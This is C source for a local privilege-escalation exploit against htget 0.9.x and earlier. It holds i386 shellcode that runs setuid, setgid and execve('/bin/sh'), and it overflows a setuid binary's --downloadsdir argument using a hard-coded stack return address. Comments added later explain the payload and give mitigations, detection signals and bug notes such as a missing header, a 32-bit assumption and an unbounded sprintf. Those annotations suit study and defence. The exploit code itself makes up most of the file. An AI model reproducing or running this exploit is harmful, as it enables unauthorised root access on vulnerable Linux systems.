htget 0.9.x and below local root sploit.
5399850df8e0ceecf6000ec907c6faff3b8ab9f7a58340f19d5a40572aa50f18
/*
htget <= 0.9.x local r00t sploit
by
Darkeagle
htget default in: Debian, Red Hat
(c) darkeagle
*/
#include <stdio.h>
#include <string.h>
/*
 * Payload appended after the filler in main().  The byte sequence is
 * Linux/i386 machine code: three `int 0x80` system calls (eax = 0x17,
 * 0x2e and 0x0b, i.e. the i386 setuid, setgid and execve numbers) with
 * the trailing "/bin/sh" string used as the execve path.  The string is
 * placed into the command line by sprintf below, so it must not contain
 * a 0x00 byte before the end.
 */
static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh"; // setuid(0); and exec(/bin/sh) code
/*
 * Entry point.  Builds one oversized --downloadsdir argument (10000 filler
 * bytes, a saved return address overwritten at offset 8988, then the
 * shellcode) and runs the htget binary named in argv[1] with it through
 * system().  The "local root" claim in the header presumably depends on
 * that binary being installed setuid root -- confirm against the target
 * package before drawing any conclusion from this listing.
 *
 * Mitigation/detection notes for maintainers reading this as a test case:
 * the return address below is a fixed stack address, so any stack
 * randomisation, non-executable stack or stack-protector build of the
 * target defeats this pattern; an argv entry of ~10 KB to a setuid
 * binary is itself a usable audit signal.
 *
 * argv[1]: path to the htget binary.  Returns nothing meaningful (no
 * explicit return statement; exit(0) is used for the usage path).
 *
 * NOTE(review): exit() and system() are declared in <stdlib.h>, which this
 * file does not include -- both are implicitly declared here, which is
 * invalid since C99 and a hard error in C23.
 */
int main(int argc, char *argv[])
{
long RET;
char *path;
char buf[14000], cmd[14000];
if ( argc < 2 ) { printf("HTGET <= 0.9.x local lame r00t exploit by darkeagle\n\n"); printf("usage: %s <path>\n", argv[0]); exit(0); }
path = argv[1];
RET = 0xbfffc240; // mandrake 10.0 OR  -- hard-coded stack address; only meaningful for the environment the author measured
memset(buf, 0x00, sizeof(buf));
memset(buf, 0x43, 10000); // 10000 bytes of 'C' filler; the rest of buf stays zero so the string terminates after the shellcode
sprintf(buf+10000, "%s", shellcode); // shellcode sits just past the filler
/*
 * Overwrite 'long'-sized bytes at offset 8988 with RET.  Written through
 * a long* cast, so the byte count is sizeof(long): 4 on the i386 target
 * the shellcode is written for, 8 on an LP64 build, where the zero upper
 * bytes would end the string at offset 8992 -- i.e. this line assumes a
 * 32-bit long.
 */
*(long*)&buf[8988] = RET;
/*
 * cmd is 14000 bytes; buf contributes ~10047 bytes plus the option text
 * and URL, so a path longer than roughly 3900 bytes overflows cmd here
 * (unbounded sprintf).  system() then runs the line through the shell,
 * so argv[1] is also interpreted by the shell unquoted.
 */
sprintf(cmd, "%s --downloadsdir=%s http://unl0ck.org", path, buf);
system(cmd);
}